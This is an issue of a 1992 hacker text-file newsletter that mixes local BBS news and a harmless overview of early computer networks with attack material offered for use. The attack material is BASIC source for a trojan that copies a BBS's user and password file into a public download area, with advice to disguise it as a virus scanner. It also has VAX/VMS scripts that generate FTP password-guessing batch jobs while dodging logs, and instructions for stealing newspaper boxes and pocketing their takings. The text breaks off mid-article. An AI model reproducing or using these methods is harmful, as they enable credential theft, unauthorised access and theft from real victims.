Copy Link
Add to Bookmark
Report

Critical Mass 7

eZine's profile picture
Published in 
Critical Mass
 · 5 years ago
1

  

"It's Alive! It's Alive!"

_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 07 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l

==--> ==-->
____ __ ____ ==--> <03/26/92>
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 7
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~




Critical Mass Technical Newsletter is free to those who wish
to gain in further knowledge of topics of Telecommunications,
Datacommunications, Computer and Phone Security, Software and other
forms of piracy, explosives, and other forms of not widely known or
talked about topics.

All article are totally original, unless stated otherwise.
We will not except unoriginal, plagiarized articles, or article
that contain false information. We except articles from anyone who
is willing to follow these criteria, and as long the editors, writters
and S.A.O.O. members feel that the article is worthy to print.

We encourage all to download these files and pass them on
freely to others as long as credits of the editors, writer or
S.A.O.O. is not modified in any way.

There is no set date for release issues, but we attempt to
put them out as frequently as possible.

We now also offer BBS's outside the Tallahassee area to get
on our BBS listing. If you decide to get on this list, we will send
you issues as soon as they are produced.

If you have any questions pertaining to a article, please
leave E-Mail to the author of the article. If you cannot get in
contact with the author, please leave "The Beaver" mail at the
following BBS's, he will try to put you in touch with the author,
and/or try to answer your questions.

The Beaver

The Back Door BBS BlackHawk BBS
(904)997-6127 (904)421-9255



Warrior's Retreat Wizard Spell Book
(904)422-4606 (904)574-3447


Tower Of Power
(904)668-6745


Or, if you have access, one of the following S.A.O.O. BBS's.

Hacker Wholesale <904>PRI-VATE
Speed Shop <904>PRI-VATE
S.A.O.O. Main <904>PRI-VATE


If you wish to become a member of the S.A.O.O. please leave
The Beaver E-Mail, where he will send you an application for you to
fill out. From there, local S.A.O.O. members in your area will
consider you and take a vote on if at that date you can become a
member.


We are always looking for experienced and even
non-experienced p/hackers to join. Only after a back-ground check and
the vote, will you be let in. If you fail to get in, do not be mad,
we have turned down many people. Simply wait, improve the reasons
that you where not let in, if possible, and in the mean time, learn.

We are also looking into other remote S.A.O.O. support
boards to net with and share information with. In the event that
you would like to support a S.A.O.O. chapter in your area, please
contact a member of the Tallahassee S.A.O.O. Benefits do come.

Currently we are looking into mostly the Florida region,
from Jacksonville To Miami, but are willing to reach into other
areas.

Head Chief And Writer - The Beaver
Editor - Flea


Members - <S>ilicon <A>luminum <O>xidation <O>rganization.


This Issues Articles Include:


I. - Local News
By The Beaver.

II. - Network Discriptions
By <Unknown>

III. - Simple RA BBS User.bbs Trojan
By The Beaver

IV. - How to support yourself doing little to nothing.
By The Beaver, Shadow Hacker, D.M., Section 8, etc

V. - Beav's FTP Batch Hacking Method <For VAX/VMS>
By The Beaver

VI - The SAOO Generic Telenet Scan Part II
Scanned By The Beaver.

VII - Brief discription on really hiding directorys
By Dementia Meister

VIII - Down and dirty chemistry. Part I
By Art Phish

VIV - Closing notes.
By The Beaver



__________________________________

Local News
The Beaver
_______________________



Hello, and welcome to yet another issue of Critical Mass.


Man has it been a great year for hacking for fellow S.A.O.O.
members in this area, but we will not go into that right now........

As you might recall, in the first CM, I wrote a editorial on about
the downfall of fun and intresting BBS's that allow you to speak freely.
I am now happy to say that this is changing rather fast. I have seen more
pirate boards, both private and public, pop up in this area, that it almost
brings a tear to my eye. This raise a point.....

A new BBS echo has hit the ole town of Tallahassee. It is called
"[Unregistered] Net", and the primary topic is on Piracy, Hacking, Phreaking,
and pretty much any topics that are not talked about in the normal realm
of people. It IS however a totally legal net, so basicly this means that
there is NO stolen account's/codes/etc traded on this perticular net. If
you would like to become a part of this net, please contact 'The Beaver'
or 'Section 8' pretaining to information on the net and how to get on. There
are currently 5 boards on the net <Actually as of this writing, the net is
not up yet>, but we expect three or four more to be on in the near future.
If intrested, mail one of the above, and all information will be
sent to you. There is also the SAOO net, which will be coming into action
soon. In order to be a part of this net, one must be either a active member
of the SAOO and/or support a SAOO support BBS. Please contact one of the
above for further information.

It looks as if the ole Upper Deck will be down longer than expected.
So don't call looking for it. When it does come back up however, we will
have more storage so that we can carry more files online.

The S.A.O.O. Telenet Generic Telenet Scanner Version 1.1i Beta is
out, though this is nothing to really brag about. It works, but as stated
it is a beta version. As you may have noticed, it came with your issue of
Critical Mass#7. As of this time, you are slightly ahead of people how are
downloading version 1.0i beta off of Tallahassee BBS's, in that v1.1i beta
contains a bug fix. See the Doc's for more information! Also, feel
privileged.

Currently, there is some talk also about having a local Computer
convention of sorts. What is being looked into right now is to have a
basic get together of modem users in our area, and hopefully along with
outsiders as well. What is desired is a two day long event in which
users get together and discuss serval topics, along with speakers in all
fields, including computer security. What hopes to be arranged is a
'conference' of sorta, for speakers ranging from MircoSoft to local DEC,
FCIC, FDLE and possible FBI computer secuity officals. This is in its
very early planing stages. If you wish to help out the efforts, please
contacts your nearest S.A.O.O. member!

Welp, it looks like ole Abigail Natias is leaving the Tallahassee
area and is heading for the Ft. Walton Bch area. He has been a fellow
SAOO member since it was founded. Never fear though, he remains in the
SAOO, and hopefully, within the next few months, a new SAOO chapter will
be opening within that area.

There is a new BBS on internet that you might find intresting. It
is pretty much a underground BBS, so to obtain information on it, please
contact "The Beaver" at one of the given BBS's.


_________________________________________

Network Descriptions
By <Unknown>
___________________________



Editor Note:

This was orginally a message posted on a BBS in Ft. Walton Bch
Florida. Unfortunatly, the author is unknown to us, so we
cannot give him/her credit. Also, this text is somewhat old
so, not all the information is accurate.


- The Plethora of Networks -



Since I have been at an ARPANET site for about three years, and a USENET
site for the same amount of time, I think I can comment on some of the
Networks that exist out there. Particularly since Berkeley has become
a gateway for several of them.

ARPANET
-------
Brought to you by the fun folks at DARPA, it was one of the very first
experiments with computer networking, and certainly the first on a national
(and later international) scale. It is centrally controlled and implicitly
routed (i.e. the network figures out how to get from point a to point b).
To join, you have to have a gov't sponsor and it is for the execution of
official gov't business & research. (sure it is...)

In so far as I am aware, all links are faster than 9.6Kbaud, and a good
number of them are 56Kbaud. All appear to be dedicated. Number of sites is
somewhere between 250 and 300. If you choose to count the whole internet,
things get a little bigger. Anyone have any ideas about the number of
internet sites? Three basic services are offered by the ARPANET:

FTP - File Transfer Program (fetch/send files anywhere) telnet
Interactive access to other hosts on the network MAIL Electronic Mail

MILNET
------
Stepchild of the ARPANET (or perhaps goosestepping child?), MILNET is where
the military sites gather to do the same things ARPANET does, without
disruptions caused by networking reseach (i.e. it is a production
version of the ARPANET). It split from the ARPANET in October of 1983.

CSNET
-----
This is a network funded (initially, although they will be self-sufficient
later on) for the purpose of Computer Science Research by the National
Science Foundation (and probably many others). By self-sufficient', I mean
that the individual member sites of CSNET will pay the full cost of
central control, administration, and ARPANET access. Last price I was
quoted was $30K/year. Presently seems to be between 50-100 sites.

I'm a little shaky on what this network has in terms of services, but
here goes: Services seem to be limited to MAIL, but FTP is coming. Mail is
handled with the MMDF software, which operates over the phone. There are two
ARPANET gatways: UDEL-RELAY and RAND-RELAY. These two sites handle the
phone traffic to the rest of the net (??) from the ARPANET. Network
addressing is implicit. To get to a CSNET site from the ARPANET:

mail person.site@RAND-RELAY (or UDEL-RELAY)

BITNET
------
This is a network of IBM hosts, and seems to be built along the same lines
as the ARPANET (implicit addressing, dedicated lines, central control) but
not all the sites have the same capabilites. Services supported: MAIL,
and FTP (for those sites that have RSCS). Presently is about 50-60 sites.
Founded by CUNY, after they got IBM to cough up the software that is used in
the IBM internal VNET. I have no idea how fast it goes. Scope: national. To
address someone on the BITNET from the ARPANET:

mail person%site.BITNET@BERKELEY

BERKELEY's mailer converts this to

G:SITE=PERSON

and it gets sent to UNIX G (in the UCB Computer Center), which in turn sends
it to the IBM 4341 (UCBVMA on the BITNET), and from there it goes where
it's supposed to...

DEC Engineering NET (E-NET)
---------------------------
This is DEC's internal network of engineering machines (now you know
where VMS comes from!). It is centrally controlled, semi-implicitly
routed (they are converting from an explicit routing scheme) and is
composed of somewhere between 2000 and 2100 sites. Primary service seems to
be MAIL, but there is no doubt some form of FTP as well. Speed seems to be
somewhere in the higher ranges (4800+ baud), but I infer this from speed of
mail propagation alone. This network is international in scope, with
several European sites. For ARPAnauts, you can mail to the E-NET:

mail decwrl!rhea!site!person@BERKELEY

The site decwrl' talks to ucbvax' with UUCP. ucbvax' is the ARPANET site
BERKELEY. The mailer at decwrl converts address syntax to

RHEA::SITE::PERSON

and away it goes...

There is a DEC site on the ARPANET (DEC-MARLBORO) which appears to do
gatewaying duty now and again, but by hand only. This would be an ideal
point to establish a real gateway (hint, hint...)

(and now, for the grand finale...;drum roll please=)

UUCP/USENET (ta da!)
--------------------
These two networks are forever intertwined, and from the ARPANET
point of view, there is little difference between the two. By the
nature of the beast they must be discussed together. UUCP is an acronym
for Unix-to-Unix Copy, a file transfer and remote execution facility which
operates over a direct line (max 9600baud) or over the phone lines
(typically 1200 baud).

Mail is transmitted through the network on a pass it on basis, and at
present, only the mail software knows how to transfer stuff beyond a site's
immediate neighbors. The UUCP network exists because some of my neighbors
talk to some of your neighbors, so through them we can send mail to each
other. The network has no central control, and no one knows how many
sites there are, or how far the network extends. Anyone can join the
network, all it takes is a UNIX system, and another site willing to
talk to you. After four months of traffic analysis, I have found just
over 2000 UUCP sites.

USENET is a subset of the UUCP network. On top of the existing UUCP
software, sites in this network run netnews', which is a bboard system,
also on a pass it on basis. Imagine a bboard system in which you post
something, and you pass it on to the other USENET sites you talk to (and so
on, and so on, ad nausem), until the whole network has seen the item you
posted. The discussions are separated by topic, and if you thought that the
ARPANET had a wide range mailing lists, the USENET has currently
somewhere between 150-200 active network wide newsgroups discussing
things as esoteric as UNIX bugs to mundane things like cooking. There are
approximately 600 USENET sites covering the continental US, Canada,
Europe, and Australia. There is a USENET directory kept by Karen
Summers-Horton (cbosgd!map@BERKELEY), and it is posted monthly on the first
of the month to net.news.map.
The anarchy of the network is interesting. Among other things, it
means that you must have an educated network community (ever try to educate
people at 600 sites??) and punitive actions are very nearly impossible on
a unilateral scale. It makes path routing difficult, however. The
directory includes information about links that a particular site has, but
it is up to the site to provide and maintain that information. Since the
network is in a constant state of flux, it is very hard to map the whole
thing. Unlike the ARPANET, usually the best you can do is get a snapshot.

(finis)

Now. Where I err, please correct me. Most of the networks mentioned get
HUMAN-NETS in one form or another, so I expect that corrections will filter
in over the next few days. However, on the whole, I don't think I have missed
anything major.

For the networkingly confused, I hope I have been of some help. This got
just a touch longer than I had anticipated.
A bit more info on Digital's ENET

First I'd like to thank the author of the compendium on networks.

And second, I'd like to give a little more information on the Digital ENET.
It is composed of systems running our DECNET software products, first
introduced about nine years ago.

DECNET is much more than a mail network. It is a product built on a
layered network architecture (DNA) with lower, non-programmer accessible
data-link and routing layers, and higher, programmer accessible, session
layers.

It is similar to the ISO model on open systems interconnect. Since it is
older than that model, it does not correspond exactly, but will, more and
more, as time goes by and as the worldwide networks develop.

At the data-link level it can use synchronous or asynchronous lines of
any speed running DDCMP, public network lines running X.25, parallel
links running protocols specific to those devices, and Ethernet. Using
gateway products it can create gateway links into an IBM SNA network.

At the user accessible layer, it is possible for any program to open a
transparent, full-duplex, channel to any other program on the same or any
other node in the network. Programmers can take advantage of this "network
logical link" to build any application they wish.

Various Digital supported protocols running on logical links are
host-to-host terminal connections, allowing a user at any node to act as
an interactive terminal on any other node, Mail, the Data Access Protocol,
(see next paragraph) and several others.

The DAP protocol is used to copy files, but it is much more than a file
copy protocol. It permits a program on any system to access a file on any
other system as though that file were a local file. In fact, VMS and RSX
using the DAP routines buried in RMS permit a nodename to be simply a part
of a file spec used by any program.

DECNET does a bit more than implicit routing; it does dynamic path routing.
As a result, given sufficient alternate paths, the loss of an
intermediate node does not affect the operation of traffic currently routing
through that node. Dynamic path routing was first made available in
DECNET Phase III, offered for sale almost five years ago.

For example, since our network has three transatlantic links, a few
months ago, we had a serious failure of the links between Massachusetts and
the remainder of our engineering and marketing headquarters 30 miles to the
north in New Hampshire. But due to the fact that some of our transatlantic
links go into New Hampshire and others into Maynard, we did not immediately
notice the problem. Things got a bit slower, since we were no longer using
several 56Kbps links but were pushing all traffic through some 9600bps links
to the U.K., down to Geneva, and back. The reason there occasionally appears
to be some implicit routing in our node strings is that the Phase III
version of DECNET had a maximum of 256 addresses. This restriction has been
lifted in Phase IV. However, as a result of the restriction, it was
necessary for us to partition our network.

Reassigning node numbers will not be complete for several months, and not
all systems will upgrade, so there may be a few systems which require one
intermediate hop from RHEA. Many of these will have definitions on RHEA
making that transparent to the sender (though a recipient would see the
hop). The rest should be directly addressable from RHEA, whether located
in the U.S., Canada, the Caribbean, Europe (13 countries now), the Middle
East, the Far East, or Australia. (Remember, IBM is the only computer
manufacturer larger than Digital.)

Compliments to Mr. Fair - an excellent summary article. Would that Human-Nets
had more such.

To expand on CSNET: It is currently funded by the NSF, and expects to
become self-supporting during the next few years, based on member fees. These
fees are:

$ 30,000 - commercial sites
$ 10,000 - government and not-for-profit
$ 5,000 - educational

These fees may be reduced by petitioning for a reduction in the
case of small outfits, and are lower for people who already have a net
connection via Arpanet.
The CSNET membership list as of Dec. 1
shows:

85 Phonenet sites
6 Telenet sites
18 Arpanet sites
4 CSNET-owned hosts

Not all of these sites are operational yet, though most are. Phonenet sites
are served by two Relay machines, which call them up nightly to exchange
mail. Text files may be automatically transferred using MMDF-based
mail-receipt programs, though this is obviously not the best way to do
business. Bandwidth here is limited by the 1200-baud phone lines as well as
by the capacities of the Relays. Mailing-list stuff can be handled OK,
but Usenet traffic breaks the Relays by sheer load.

Telenet sites run TCP/IP on top of X.25 virtual circuits, using software
developed for CSNET at Purdue. Personally I think this is hot stuff.
If your phone bills are $1500/month, you can run equivalent traffic over
Telenet for about $1200/month, last time we figured it out. And, you get
full Internet connectivity and services into the bargain. Because the
drop lines from Telenet to the host are really only 9600, 4800, or 1200
baud dedicated phone lines, instantaneous bandwidth is not as good
as Arpanet, but it's not bad. And, you and the rest of the world will be
hard-put to tell that you're not on Arpanet directly, except you don't
have to deal with the DoD. This software really works, and works well.

Arpanet sites run standard Arpanet software - no change.

In addition to simple net connectivity, CSNET brings the
benefits of centralized network management. Basically this means that
if your mail isn't moving, you have experts to scream to, and they really
will work hard to fix the problem. There are other benefits such as
ongoing mail system development, an automatic nameserver, and so forth.

Management of CSNET has recently been transferred away from the contractor
committees which built the net to a newly-formed Executive Committee,
which is overseeing the move from a research to a service organization.
The two relay machines are moving to BBN - it's cheaper and easier to run a
single computer center and communicate via WATS lines than to spread out the
Relay operations.

Just to clarify something... DECNET is the name of a product sold by Digital
which any customer can use to build their own network.

DECNET is used to build Digital's internal network. The internal network
name has been a hotly debated subject (what's in a name?) but the most
commonly used name is the ENET, since the largest internal use was within
Engineering.

Now the whole company is being interconnected, and Engineering
Network is not really an appropriate name. But the E in ENET doesn't
necessarily have to stand for Engineering.

We think it can stand for Everthing, Employee, Everywhere, or whatever
anyone wants it to stand for.
The lack of any serious central control (other than a nodename
registry) makes things like this not really matter.

Here's a network you left out: the XEROX Internet. Most outsiders tend to
overlook the XEROX Internet, for various reasons:

1) only a small proportion of the traffic is gatewayed to or from other
networks;
2) what little gatewaying there is gets done almost invisibly;
3) the name difficulty. (I'm told that XEROX used "Internet" first, but that
doesn't matter much now.)

The XEROX Internet only has about 2000 users, but it is widely distributed,
with users in Europe and Japan.

The mail transport mechanism within the XEROX Internet is called
Grapevine. Grapevine addresses look like "<user>.<registry>". If the
registry you're sending to is the one you are in, you can leave it off, and
the address becomes merely "<user>". Registries are geographic - the two
largest are "PA" (Palo Alto), for Northern California, and "ES" (El
Segundo), for Southern California.

To send mail in from the ARPAnet, the address looks like:

"<user>.<registry>@PARC-MAXC".

If the registry is PA, you can leave it off, giving "<user>@PARC-MAXC".
This is what I mean by invisible gatewaying - to outsiders, it looks
like all 2000 of us Xeroids receive our mail on poor little PARC-MAXC. Not
so - it's just a gateway. I think the source of the confusion is that people
are used to explicitly specifying a host for the mail to be delivered to,
as well as a user on that host. Grapevine's mail servers are politely
invisible.
Sending mail out to the ARPAnet is as easy as pi. "ARPA" is just another
registry, so I just say "<user>@<host>.ARPA". Or if I'm really
lazy, I can just say "<user>@<host>", since anything with at atsign
automatically goes to the ARPAnet.

In addition to the networks previously described, there are five public data
networks actively serving the US and more in the works. The five national
PDNs are all common carriers, like Greyhound - that is, anybody whos pays
the fare can use them. They all provide an X.25 interface, which gives
a virtual circuit service - there is as yet no international standard for
mail or FTP. All provide a virtual terminal capability via the X.3/X.29
PAD standards. They all compete vigorously for business, and I'm sure
I'll hear about it immediately if I have left out anybody's capability.
Here (in alphabetical order) are the five established PDNs:

ADP Autonet
175 Jackson Plaza
Ann Arbor, MI 48106
(313) 769-6800

Besides the US, has satellite links to London, England and Delft, The
Netherlands. Maximum internal speed is 9600 bps. Nodes are PDP-11s with
KMC-11 front end microprocessors. Internal protocol was described to me
as derivative of the old ARPAnet protocols.

CompuServe Incorporated
Network Services Division
5000 Arlington Centre Blvd.
P.O. Box 12
Columbus, OH 43220
(614) 457-8600

Internal speeds to 56k bps. Nodes are PDP-11s with 6809 microprocessor front
ends. Internal protocol is DDCMP.

GTE Telenet Communications Corp.
8229 Boone Boulevard
Vienna, VA 22180
(703) 442-1000

Internal speeds to 56k bps. Nodes are arrays of 6502s in a redundant, load
sharing configuration. Internal protocol conforms to CCITT
Recommendation X.75. Supports automatic recovery of virtual circuit
when a node fails during a call. Built by some of the folks from BBN who
built the ARPAnet originally. Provides a mail service called Telemail.

Tymnet, Inc.
2710 Orchard Parkway
San Jose, CA 95134
(408) 946-4900

Internal speeds to 56k bps. Nodes are arrays of "Tymnet Engines" in a
redundant, load sharing configuration. The Tymnet Engine is a Tymnet-built
32-bit processor derived from the Interdata 732, re-engineered for
extremely high MTBF. Internal protocol is a unique Tymnet design which
repacketizes inside the network and does flow control at the byte level,
like TCP. Supports automatic recovery of virtual circuit when a node fails
during a call. Provides a mail service called OnTyme.

Uninet
United Telecom Communications, Inc.
2525 Washington
Kansas City, MO 64108
(816) 221-2444

Internal speeds to 56k bps. Nodes are Modcomp 7830s. Internal protocol is a
Uninet-designed virtual circuit protocol, on top of HDLC.

In addition there is, of course, the new AT&T offering, NET/1000. Nodes
consist of arrays of VAXen with a Series/I for line handling. They see
the function of their network as storing information, rather than just
forwarding it like the other networks. The internal protocol is X.25, but
they don't support an X.25 user interface! (No, I don't know why). For
further information, call Mr. John M. Finn, their San Francisco account
executive at (415) 452-7292.

Graphic Scanning and Computer Sciences Corp. are in the process of spinning
off their internal networks, as GraphNet and InfoNet respectively I
believe. There will probably be X.25 interfaces, if they don't exist
already.

GE Information Services Company has an internal network called MARK*NET.
There is not as yet an X.25 interface to it.

And, how could I forget, the State of Utah boasts its own Public Data
Network! It is called ComWest and is being spun off by Blue Cross/Blue
Shield of Utah, which needed a good way to get claims data from places
like Panguitch, Utah up to Salt Lake City. The internal circuits are leased
from Mountain Bell (no, they're not barbed wire, skeptics) and run up to
9600 bps. Nodes are Dynatech Packet Technology Multi-Switch.25 packet
switches, which are based on the Z80 micro. There are several sites besides
BC/BS, one of them being the University of Utah DECSYSTEM-20.

Outside the US, there are public data networks operating in about forty
foreign countries, basically the ones that are industrialized. We have a
user who logs in regularly from Stockholm via the Swedish PDN <->
Telenet <-> ComWest. He says he gets good response.



_______________________________________

The Simple RA User.BBS Trojan.
By The Beaver
_____________________________



Member S.A.O.O. <Silicon Aluminim Oxidation Organization>




The entire idea behind the code is simple. To get the User.BBS file,
which contains all the user's and there passwords <Along with other intresting
facts>. It is currently set for RA, but can probably be modified for Qbbs, or
what not.... Here is the little "ho-down" on the program and it's steps.


1> Find RA's User.bbs file, using the program "dirscan.com"
Once found, store the path.
2> Find a file that you are SURE is in a files transfer area. Take for
instance, if you know that there is a file in the Utilities area
called "bigdeal.zip", and you want the User.BBS file to go in
that directory, we search for "bigdeal.zip", and store the path
it came from.
3> copy the User.BBS to the file transfer area as something non-
suspision. So if it copys, as in our example, to the utility
directory, make it something like, "list.com" it is copied.
<NOTE: Make sure that the "utility" does NOT actually exsist!>
4> Call everyday and do a "raw directory" and look for the file.
Since the files.bbs is not modifed, it will not be seen on a
normal file list, so a raw is required. If raw-directory is not
supported, then simply go on everyday and try to download
the name it is stored under. In our case, "list.com". If it is
there, whether or not it is in a standard file list, it can be down-
loaded.

The "diskscan" program is nothing more than a utility like, "where".
Basicly all it does it find files for you. This should not be a
very hard utility to find.


Once you obtain the user file, you should have no problem with a
text editor going though and determining what the username and
passwords are, along with other information.
If you are of thoughs neat types, you can get RA or the utility
"rauser.exe" and rename your physdo utility back to "users.bbs" and
with a few little modification, you can use the utility that looks
though that and gathers the fields. Anyrate, I hope you enjoy this,
but it real was not that hard to do.

Actually, Dementia Meister is writting a better version of this
in pascal, but I am sure you can figure it out and convert it to
whatever laugage you so desire.


Also, I would like to note the fact that this is not
a very easy bug to cure, and I see no what for sysops
to protect themselve from the use of this method, other
than having a careful eye. <At least not right off ayway>.


Member S.A.O.O. < Leave mail on membership >
< Only the worthy hack's >
< need apply! >


---==<Beaver>==---






' This is version 1.0 of the RA user.bbs trojan horse.
' Object.... To find users.bbs and copy it to a download
' area, so that it maybe download, thus all usernames and passwords
' are obtained.
'
' This program uses "dirscan.com" file finder.
'
' Written By The Beaver


SHELL "dirscan users.bbs >me" ' Find User.bbs with full path
' and put it in a file called
' "me".

OPEN "me" FOR INPUT AS #1
INPUT #1, userbbs$ ' Grab Path out of the file.
CLOSE #1 ' okay, we are done.
KILL "me" ' kill the "diskscan" output file

SHELL "dirscan (filename) >me" ' Now find the file transfer area.
' we search for a file we KNOW is
' there.
' Replace the (filename) with a
' file that you know is in the
' download directory


OPEN "me" FOR INPUT AS #1 ' Grab path out of file again.
INPUT #1, filetrans$ ' Okay, got it!
CLOSE #1
KILL "me" ' kill the "diskscan" output file


FOR i = LEN(filetrans$) TO 1 STEP -1
IF MID$(filetrans$, i, 1) = "\" THEN a = i: GOTO step2
NEXT i


step2:

filepath$ = LEFT$(filetrans$, a) ' okay, we got the file area
' path we need. Now do the
' dirty deed.

SHELL "copy " + userbbs$ + " " + filepath$ + "neatgame.exe >me"

KILL "me" ' the ">me" keeps output from going to the screen
' <the "1 file copied" message>. All output to
' con. is redirected to a file. We are killing this
' file

' Also, make the "neatgame.exe" to what ever file
' you desire to call it.


' From this code, I advise a few things. This is only raw source.
' Add in a few nifty things, so it appears as a virus scanner or
' maybe a disk doctor or something. Just add in print statements
' here and there. Plus, as some sort of disk utility, all the hard
' disk access can be explained!





_______________________________________________________________

How to support yourself doing little, or nothing
at all.

By Bored SAOO Members Late One Night
___________________________________________




Here we will discuss the infamous "Democrate Fraud"
method.


I take no resposiblity for any prosecutions, damages,
injuries, etc. Attempt at your own risk...



Though, this method has never been tested, along with myself
and five fellow SAOO members thought of this while sitting
around a dead Democat Paper Dispenser. Simply follow the
following steps....


1> Getting the Machine

Get you hands on a Democat Paper Machine. To do this, take
three of your fellow comrades in one vechicle, with a
large back seat/trunk <A Van is ideal> and approach
a nice, lonely paper machine. Get two people to grab it
while one watchs out. If the machine is bolted down,
use bolt cutters.

2> Opening it

Cut the lock off that secures the brace pin <Located
near the top on the right hand side on most machines>.
Remove the brace pin and "open de hatch". Remove the
money. Replace the lock <that secures the brace pin>
and secure with new lock.

* NOTE: Do not beat it open! It will only serve as a
nice plant stand, or as it was at Abigail's house,
"That thing in the corner."

3> Re-distribution of wealth

There is still more money to be made. Now, take the
paper machine <Now with YOUR lock on it> and drop it
off in a somewhat populated area. Not in a place so
populated that the real paper men will see it, but
in a back area <I.E. - By a pool near apartments,
in a laundry room in apartments>. In other words,
where the real paper man won't see it.

Now, every morning goto a paper stand <A legit stand that
is!> and put in your 50 cent <$1.50 on Sundays!> and
remove ALL the papers.

Now return to YOUR paper stand and put in all the papers
you just got into your paper machine with your lock on
it!

Now, every night, return and unlock your paper stand and
collect your money! Repeat this process and distribute
your stands around as much as possible. Start this entire
process over again....


4> Closing notes.....


Though past experiences of certain members of the SAOO
<Shadow Hacker, Abigail, and Dementia Meister>, they
got a whole $5.00 on a stolen machine <That they beat
open, because of lack of bolts cutters>. The machine
they got was in a area not to populated.

We estimate that a real popular area, you could maybe
get out of one box $15 dollars. This is a problem,
the paper people already got boxes there. We figure that
a box in a more ideal area for you will probably will
average $7.50 on weekdays.

Sudays are another story. You might make a possible
$20 dollars for that day. So for one box, in a decent
location, adverage is......

Week : $65.00
Month : $260.00
Year : $3120.00

With this in effect, lets say you can operate 5 Boxes
max, safely and effectively. Lets average that....

Week : $325.00
Month : $1300.00
Year : $15,600.00

Which is, of course, tax free. This should be efficent
to keep up with most of your bills and whatnot. With a
real job, you could make real money! Or, if you are
unlike me, collect welfair and live like a king! Welp
there you go!


<P.S. - Don't take this text TO literally!>


---==<Beaver>==---


Idea conceived by SAOO members - The Beaver, Shadow Hacker,
Abigail, Dementia Meister and Section 8.

Thought up just before before getting rid of a beat up
box and hacking on machines at Utaha and Miami Fl.

<July 24, 1992>



______________________________________________________________

The VAX/VMS FTP Batch Hack.
Written By The Beaver
________________________________________________



When I came up with this method about a year and a half ago, I never
knew how good it would work out for me. I have cracked more accounts using
this method than I can possibly think of. In order to use this method, one
must of some sort of programming knowlege and understand, at least somewhat,
how VMS works.
First off, let me briefly explain the method before we actually go
into coding or anything like that. FTP <File Transfer Protocal> is used as
a file transfer method from one machine to another. What really makes this
great is that any machine that supports FTP can be hacked using this method.
This means that you can use you hacked VMS system to hack any other
system that supports FTP that runs any OS! Heres how the idea came to me. One
night, I was hacking on a VMS system somewhere on the Internet, and I
remembered that everytime you fail a account, the user is notified that there
was a invald login attempt, and if you have to many invalid attempts in a
given time, bells and whistles go off, telling the operator that a "breakin"
is in progress. This can be a real bummer.
Well I got to thinking that this "front door" hacking was really becoming
a drag, then it dawned on me. No logs or records of invalid attempts are
recorded <At least to my knowlege> by FTP, which you have to "login" to send
files to the remote machines! Now I'm set. I'm hacking like hell, the another
idea "spawn's" on me.
What if I upload a ton of commonly used passwords, write a program that
will create a batch job that will attempt all the passwords on the accounts
that I was hacking. Then I could "submit it" and let it hack for me? Trust
me, it worked like a dream.
From that, I came up with tons of variations of the program. Well,
lets get started with the technical info.
All the code was written under VMS BASIC, because everybody and there
grandmothers <The ones who hack> knows BASIC. The first example it a hack
over internet on a single account with a password list.

<Title: One User, Multiple Passwords>



5 on error goto 50 ! This will Catch EOF

10 user$="bob" ! This is ther username
open "passwords.dat" for input as#2 ! Open File w/ Favorite Passwds
open "hack.bat" for output as#1 ! Our Batch That Will Hack.
10 input#2, pass$ ! Grab A Password

20 print#1,"$ ftp <Target Address> /user="+username$+" /pass="+pass$

30 print#2,"quit" ! Where Tried Our Password, Now Quit.
40 goto 20 ! Do It All Over Again.

50 resume 51
51 close#1 ! Got The EOF, now close
close#2 ! up and exit.
end


That simple. We now have a file called "hack.bat", which will do our
hacking for us. Ok, so we are ready to kick it off. Type the following.

Submit hack.bat /noprint / notify

Now, let me explain a little more. In line 20, where we FTP to the
desired address, you must keep the "$" in there. If it is removed, the
Batch job will not work correctly. This tell the VAX that this is a DCL
level command, so it must stay. There is none in front of the "quit", because
by then, we are not at DCL, but rather, we are using the FTP program.
Heres something very important to remember also. When you "submit"
the batch job, make sure the "/noprint" is present! This tells the system
NOT to dump batch information to the printer. If you don't do this, everyone
in the computer center will see what you are up to! That ain't cool!
The "/notify" is optional. This will simply tell you when your
batch job has completed.
Now, while its doing its thing, go off and do something else for
a while <I.E. Setup another one, eat, sleep for a change>. Okay, the batch
job completes, now you want to extract all the cool information. You will
notice that there is a big, fat log called "hack.log". This is a record
of everything that happened in our batch job. Now we check to see if we
got in or not. This part you might have to play with. I use the VMS "search"
command at this point, like thus........

Search hack.log logged

This will search the entire log for the work "logged". So if it finds
one, it will display the line that had that word. What we are looking for is
the nice key words "logged in". From here it will dump to you whether you
suceeded in logging in or not. One problem, it will only show that line, so
you might have to whip-up another BASIC program that will search for all the
important lines that contain the information you want <I.E. - THE PASSWORD!>.
There ya have it! Possible hours of work all nicely automatied for ya!
The only problem? There will be a FTP logged stored in the targets directory.
No big deal, you have there password, go over and delete it.
The following is more code, with a brief discription of what it does.
All "submits" should be done like before.

<Title: The Gobber Scan>


5 on error goto 100 ! Catch That Thare EOF

10 open "usernames" for input as#1 ! Open A List Of Usernames
open "hack.bat" for output as#2 ! Opens Our Work Horse

20 input#1,user$ ! Get a Username
30 print#2,"$ ftp <Target Address> /user="+user$+" /pass="+user$

40 print#2,"quit" ! Try Then Quit FTP
50 goto 20

100 resume 111
111 close#1 ! Got The EOF, Now
112 close#2 ! Close Up The Files
113 end


This is the one I find that is most successful! It trys the persons
username as a password. This works real nice on VAX/VMS systems, because
